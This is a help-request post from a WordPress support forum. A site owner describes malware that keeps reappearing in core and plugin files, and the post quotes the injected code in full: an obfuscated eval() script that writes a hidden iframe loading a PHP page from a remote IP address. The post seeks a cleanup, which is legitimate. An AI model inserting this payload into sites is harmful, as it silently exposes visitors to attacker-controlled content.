Malware? Script injections in random files every once in a while
-
Hello,
I’m having a huge issue with WordPress installation. Every once in a while (3-7 days) a random code is injected into different wordpress files (wordfenceClass.php, ms-function, ms-deprecated, skin.php, upload.php, etc.) The code that breaks the site looks always like that:<tag5479347351></tag5479347351><script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|91||src|height|193|width|board||51|php|206|tag1|ram'.split('|'),0,{}))</script><tag5479347352></tag5479347352>It breaks the html/php and the site turns offline. I’ve already scanned installation with Sucuri/Wordfence/Anti Malware and cleaned it couple of times, but this issue comes back.
The wordpress and all the plugins are up to date, I’m using Woocommerce and couple other plugins (google sitemap, thesis/themedy, contact form 7).
I’m not a programmer, and I’m out of ideas. Does anyone have any suggestions on how could this be repaired?
Thank you and best regards.
- The topic ‘Malware? Script injections in random files every once in a while’ is closed to new replies.